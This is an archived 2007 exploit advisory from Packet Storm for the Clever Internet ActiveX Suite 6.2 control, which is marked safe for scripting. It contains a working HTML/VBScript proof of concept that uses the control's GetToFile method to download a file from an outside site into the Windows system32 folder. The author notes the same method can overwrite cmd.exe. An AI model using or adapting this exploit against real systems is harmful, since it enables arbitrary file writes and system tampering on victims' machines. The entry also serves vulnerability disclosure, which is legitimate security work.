clever-overwrite.txt

2007-07-26T00:00:00
ID PACKETSTORM:58052
Type packetstorm
Reporter shinnai
Modified 2007-07-26T00:00:00

Description

                                        
                                            `<pre>  
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------  
<b>Clever Internet ActiveX Suite 6.2 (CLINETSUITEX6.OCX) Arbitrary file download/overwrite Exploit</b>  
url: http://www.clevercomponents.com/home/news.asp  
  
author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://shinnai.altervista.org  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7  
all software that use this ocx are vulnerable to this exploits.  
  
<b>This control is marked as  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: True  
IDisp Safe: Safe for untrusted: caller, data  
IPStorage Safe: Safe for untrusted: caller,data</b>  
  
Using the "GetToFile" method, you can download everything you want on a pc. This  
exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.  
-------------------------------------------------------------------------------------------------  
  
<object classid='clsid:E8F92847-7C21-452B-91A5-49D93AA18F30' id='test' ></object>  
  
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">  
  
<script language='vbscript'>  
Sub tryMe()  
  
test.GetToFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\windows\system32\shinnai.txt"  
MsgBox("Exploit completed!")  
  
End Sub  
</script>  
  
</span>  
</code></pre>  
`